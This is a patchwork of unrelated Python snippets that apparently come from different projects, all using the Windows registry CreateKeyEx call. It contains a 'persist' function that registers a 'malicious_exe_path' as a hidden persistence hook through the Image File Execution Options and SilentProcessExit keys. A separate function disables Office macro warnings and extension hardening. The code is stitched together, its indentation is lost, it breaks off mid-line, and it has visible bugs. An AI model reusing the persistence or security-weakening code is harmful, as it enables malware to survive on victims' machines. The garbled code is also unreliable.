def set_setting(s):
try:
try:
DeleteKeyEx(HKEY_LOCAL_MACHINE, AU, KEY_ALL_ACCESS, 0)
except FileNotFoundError:
pass
try:
DeleteKeyEx(HKEY_LOCAL_MACHINE, WindowsUpdate, KEY_ALL_ACCESS, 0)
except FileNotFoundError:
pass
CreateKeyEx(HKEY_LOCAL_MACHINE, WindowsUpdate, 0, KEY_ALL_ACCESS)
CreateKeyEx(HKEY_LOCAL_MACHINE, AU, 0, KEY_ALL_ACCESS)
with OpenKey(HKEY_LOCAL_MACHINE, AU, 0, KEY_ALL_ACCESS) as key:
if s == 1:
SetValueEx(key, NoAutoUpdate, 0, REG_DWORD, 1)
elif s != 0:
SetValueEx(key, NoAutoUpdate, 0, REG_DWORD, 0)
SetValueEx(key, AUOptions, 0, REG_DWORD, s)
SetValueEx(key, ScheduledInstallDay, 0, REG_DWORD, 6)
SetValueEx(key, ScheduledInstallTime, 0, REG_DWORD, 3)
except PermissionError:
print('Permission denied. Please run this program as Administrator.')
else:
print('Windows Update settings changed successfully.')
def registration():
import os
print(sys.executable)
if os.path.basename(sys.executable) == "__main__.exe":
try:
from winreg import ConnectRegistry, HKEY_CLASSES_ROOT, \
CreateKeyEx, SetValueEx, REG_SZ, KEY_ALL_ACCESS, KEY_SET_VALUE
root = ConnectRegistry(None, HKEY_CLASSES_ROOT)
policy_key = CreateKeyEx(root, r"rhythmcollective", 0,
KEY_SET_VALUE)
SetValueEx(policy_key, None, 0, REG_SZ, "URL:rhythmcollective")
SetValueEx(policy_key, "URL Protocol", 0, REG_SZ, "")
policy_key = CreateKeyEx(root, r"rhythmcollective\DefaultIcon", 0,
KEY_SET_VALUE)
SetValueEx(policy_key, None, 0, REG_SZ, "\"Arena.exe,1\"")
policy_key = CreateKeyEx(root,
r"rhythmcollective\shell\open\command", 0,
KEY_ALL_ACCESS)
SetValueEx(policy_key, None, 0, REG_SZ,
f"\"{sys.executable}\" --from-url \"%1\"")
print("registered")
except OSError as an_error:
print(f"unable to open registry {an_error}")
def test_CreateKeyEx(self):
from winreg import CreateKeyEx, QueryInfoKey
from winreg import KEY_ALL_ACCESS, KEY_READ
key = CreateKeyEx(self.root_key, self.test_key_name, 0, KEY_ALL_ACCESS)
sub_key = CreateKeyEx(key, "sub_key", 0, KEY_READ)
nkeys, nvalues, since_mod = QueryInfoKey(key)
assert nkeys == 1
nkeys, nvalues, since_mod = QueryInfoKey(sub_key)
assert nkeys == 0
def set_keys(self):
baseOfficeKeyPath = r"Software\Microsoft\Office"
installedVersions = list()
try:
officeKey = OpenKey(HKEY_CURRENT_USER, baseOfficeKeyPath, 0,
KEY_READ)
for currentKey in range(0, QueryInfoKey(officeKey)[0]):
isVersion = True
officeVersion = EnumKey(officeKey, currentKey)
if "." in officeVersion:
for intCheck in officeVersion.split("."):
if not intCheck.isdigit():
isVersion = False
break
if isVersion:
installedVersions.append(officeVersion)
CloseKey(officeKey)
except WindowsError:
# Office isn't installed at all
return
for oVersion in installedVersions:
key = CreateKeyEx(
HKEY_CURRENT_USER,
r"{0}\{1}\Publisher\Security".format(baseOfficeKeyPath,
oVersion), 0,
KEY_SET_VALUE)
SetValueEx(key, "VBAWarnings", 0, REG_DWORD, 1)
SetValueEx(key, "AccessVBOM", 0, REG_DWORD, 1)
SetValueEx(key, "ExtensionHardening", 0, REG_DWORD, 0)
CloseKey(key)
def maybe_set_key(key_path: str, expected: str, dry_run: bool = False, var_name: str = None):
from winreg import HKEY_CLASSES_ROOT, OpenKey, QueryValue, CreateKeyEx, SetValue, REG_SZ, KEY_WRITE, KEY_READ
from winreg import QueryValueEx, SetValueEx
try:
with OpenKey(HKEY_CLASSES_ROOT, key_path, 0, KEY_READ) as entry_key:
if var_name:
value = QueryValueEx(entry_key, var_name)[0]
else:
value = QueryValue(entry_key, None)
except FileNotFoundError:
value = None
if value != expected:
prefix = '[DRY RUN] Would set' if dry_run else 'Setting'
if var_name:
log.info(f'{prefix} HKEY_CLASSES_ROOT\\{key_path}[{var_name!r}] = {expected!r}')
else:
log.info(f'{prefix} HKEY_CLASSES_ROOT\\{key_path} = {expected!r}')
if not dry_run:
with CreateKeyEx(HKEY_CLASSES_ROOT, key_path, 0, KEY_WRITE) as entry_key:
if var_name:
SetValueEx(entry_key, var_name, 0, REG_SZ, expected)
else:
SetValue(entry_key, None, REG_SZ, expected) # noqa
else:
log.info(f'Already contains expected value: HKEY_CLASSES_ROOT\\{key_path}')
def persist(malicious_exe_path: str, target_exe: str, target_reg_keys: list):
with ConnectRegistry(None, HKEY_LOCAL_MACHINE) as hklm:
# create the `Image File Execution Options` subkey with target executable
CreateKeyEx(hklm, target_reg_keys[0], 0, KEY_WRITE)
# create the `SilentProcessExit` subkey with target executable
CreateKeyEx(hklm, target_reg_keys[1], 0, KEY_WRITE)
for reg_key in target_reg_keys:
with OpenKey(hklm, reg_key, 0, KEY_ALL_ACCESS) as target_key:
for _ in range(QueryInfoKey(target_key)[0]):
if "Image File Exection" in reg_key:
SetValueEx(hklm, "GlobalFlag", 0, REG_DWORD, 512)
else:
SetValueEx(hklm, "ReportingMode", 0, REG_DWORD, 1)
SetValueEx(hklm, "MonitorProcess", 0, REG_SZ,
malicious_exe_path)
flush_registry_changes()
def test_named_arguments(self):
from winreg import KEY_ALL_ACCESS, CreateKeyEx, DeleteKey, OpenKeyEx
with CreateKeyEx(key=self.root_key,
sub_key=self.test_key_name,
reserved=0,
access=KEY_ALL_ACCESS) as ckey:
assert ckey.handle != 0
with OpenKeyEx(key=self.root_key,
sub_key=self.test_key_name,
reserved=0,
access=KEY_ALL_ACCESS) as okey:
assert okey.handle != 0
DeleteKey(self.root_key, self.test_key_name)
def create_key(
self,
name: str,
key_wow64_32key: bool = False,
) -> None:
handler = None
sub_keys = name.split("\\")
i = 0
while i < len(sub_keys) and not handler:
try:
current = "\\".join(sub_keys[:len(sub_keys) - i])
handler = self._get_handler(current, KEY_WRITE,
key_wow64_32key)
except FileNotFoundError:
i += 1
before_index = len(sub_keys) - i
tail = "\\".join(sub_keys[before_index:])
CreateKeyEx(
key=handler, # type: ignore
sub_key=tail,
reserved=0,
access=get_access_key(KEY_WRITE),
)
def checkCreateKeys():
CreateKeyEx(HKEY_CURRENT_USER,"OSMANI")
Key = OpenKey(HKEY_CURRENT_USER,"OSMANI")
try:
QueryValueEx(Key, "timerInterval")
except:
from subprocess import call
call(["C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\powershell.exe",
"""
New-ItemProperty -Path HKCU:\OSMANI\ -Name "timerInterval" -PropertyType "String" -Value '18000'
"""])
try:
QueryValueEx(Key, "path")
except:
from subprocess import call
call(["C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\powershell.exe",
"""
New-ItemProperty -Path HKCU:\OSMANI\ -Name "path" -PropertyType "String" -Value 'C:\'
"""])
try:
QueryValueEx(Key, "LAN_DB_SERVER ")
except:
from subprocess import call
call(["C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\powershell.exe",
"""
New-ItemProperty -Path HKCU:\OSMANI\ -Name "LAN_DB_SERVER" -PropertyType "String" -Value 'http://172.16.0.7:8080/0033-OCL-2020-WS/linker.php?'
"""])
try:
QueryValueEx(Key, "INTERNET_DB_SERVER ")
except:
from subprocess import call
call(["C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\powershell.exe",
"""
New-ItemProperty -Path HKCU:\OSMANI\ -Name "INTERNET_DB_SERVER " -PropertyType "String" -Value 'http://portal.osmani.com:8049/0033-OCL-2020-WS/linker.php?'
"""])
def test_gamma_ramp():
set_gamma_ramp(device, gamma, 0.0, remap)
set_gamma_ramp(device, gamma, 1.0, remap)
try:
test_gamma_ramp()
except Exception as e:
icm = r'SOFTWARE\Microsoft\Windows NT\CurrentVersion\ICM'
try:
key = None
try:
key = OpenKey(HKEY_LOCAL_MACHINE, icm, access=KEY_READ)
except FileNotFoundError:
key = CreateKeyEx(HKEY_LOCAL_MACHINE, icm, access=KEY_READ)
try:
gamma_range = QueryValueEx(key, 'GdiIcmGammaRange')[0]
except FileNotFoundError:
gamma_range = None
finally:
if key is not None:
CloseKey(key)
if gamma_range == 256:
print('Error: Device does not support the full gamma range! '
'(or you haven\'t rebooted yet)')
sys.exit()
restore_gamma_ramp = os.path.join(application_path,
def set_office_mrus(self):
"""Adds randomized MRU's to Office software(s).
Occasionally used by macros to detect sandbox environments.
"""
baseOfficeKeyPath = r"Software\Microsoft\Office"
installedVersions = []
basePaths = [
"C:\\",
"C:\\Windows\\Logs\\",
"C:\\Windows\\Temp\\",
"C:\\Program Files\\",
]
extensions = {
"Word": ["doc", "docx", "docm", "rtf"],
"Excel": ["xls", "xlsx", "csv"],
"PowerPoint": ["ppt", "pptx"],
}
try:
with OpenKey(HKEY_CURRENT_USER, baseOfficeKeyPath, 0,
KEY_READ) as officeKey:
for currentKey in range(QueryInfoKey(officeKey)[0]):
officeVersion = EnumKey(officeKey, currentKey)
if "." in officeVersion:
isVersion = all(
intCheck.isdigit()
for intCheck in officeVersion.split("."))
if isVersion:
installedVersions.append(officeVersion)
except WindowsError:
# Office isn't installed at all
return
for oVersion, software in itertools.product(installedVersions,
extensions):
values = []
mruKeyPath = ""
productPath = rf"{baseOfficeKeyPath}\{oVersion}\{software}"
try:
with OpenKey(HKEY_CURRENT_USER, productPath, 0, KEY_READ):
pass
mruKeyPath = rf"{productPath}\File MRU"
with CreateKeyEx(HKEY_CURRENT_USER, mruKeyPath, 0,
KEY_READ) as mruKey:
displayValue = False
for mruKeyInfo in range(QueryInfoKey(mruKey)[1]):
currentValue = EnumValue(mruKey, mruKeyInfo)
if currentValue[0] == "Max Display":
displayValue = True
values.append(currentValue)
except WindowsError:
# An Office version was found in the registry but the
# software (Word/Excel/PowerPoint) was not installed.
values = "notinstalled"
if values != "notinstalled" and len(values) < 5:
with OpenKey(HKEY_CURRENT_USER, mruKeyPath, 0,
KEY_SET_VALUE) as mruKey:
if not displayValue:
SetValueEx(mruKey, "Max Display", 0, REG_DWORD, 25)
for i in range(1, randint(10, 30)):
rString = random_string(minimum=11,
charset="0123456789ABCDEF")
baseId = f"T01D1C{rString}" if i % 2 else f"T01D1D{rString}"
setVal = "[F00000000][{0}][O00000000]*{1}{2}.{3}".format(
baseId,
basePaths[randint(0,
len(basePaths) - 1)],
random_string(
minimum=3,
maximum=15,
charset="abcdefghijkLMNOPQURSTUVwxyz_0369"),
extensions[software][randint(
0,
len(extensions[software]) - 1)],
)
name = f"Item {i}"
SetValueEx(mruKey, name, 0, REG_SZ, setVal)
